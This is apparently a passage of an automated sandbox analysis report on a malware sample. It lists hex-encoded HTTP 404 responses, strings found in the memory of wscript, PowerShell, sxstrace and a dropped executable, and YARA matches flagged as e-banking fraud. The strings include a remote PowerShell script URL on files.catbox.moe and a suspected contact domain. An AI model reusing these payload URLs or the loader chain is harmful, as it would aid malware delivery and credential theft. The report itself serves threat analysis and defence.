3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:02 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:04 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:07 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66
                Source: powershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2896359779.0000000005619000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lifesentials.life
                Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2896359779.0000000005619000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lifesentials.life/ai0p/
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: sxstrace.exe, 00000008.00000002.2897094550.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895521873.000000000543A000.00000004.10000000.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000002.2894902726.00000000039EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
                Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gn
                Source: wscript.exe, 00000000.00000003.1760985865.000002383603E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762330077.0000023837DB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654347834.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761639846.0000023835FFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761358334.0000023837DBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761485798.0000023837DB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761405485.00000238361BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762142281.0000023836010000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.000002383602D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836025000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762348747.0000023837D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762399499.0000023837DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761373232.0000023837D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762367499.0000023837DB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.000002383602D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761046609.0000023836047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654525933.0000023837DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1
                Source: wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1K
                Source: wscript.exe, 00000000.00000003.1760985865.000002383603E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1762922730.0000023836053000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761200387.0000023836052000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761046609.0000023836047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761123761.000002383604D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1f:CreateObject
                Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1h
                Source: wscript.exe, 00000000.00000003.1654347834.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762348747.0000023837D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761373232.0000023837D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654525933.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654610745.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763266792.0000023837D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1u
                Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p53ou1.ps1~
                Source: wscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sxstrace.exe, 00000008.00000003.2036440767.0000000007659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
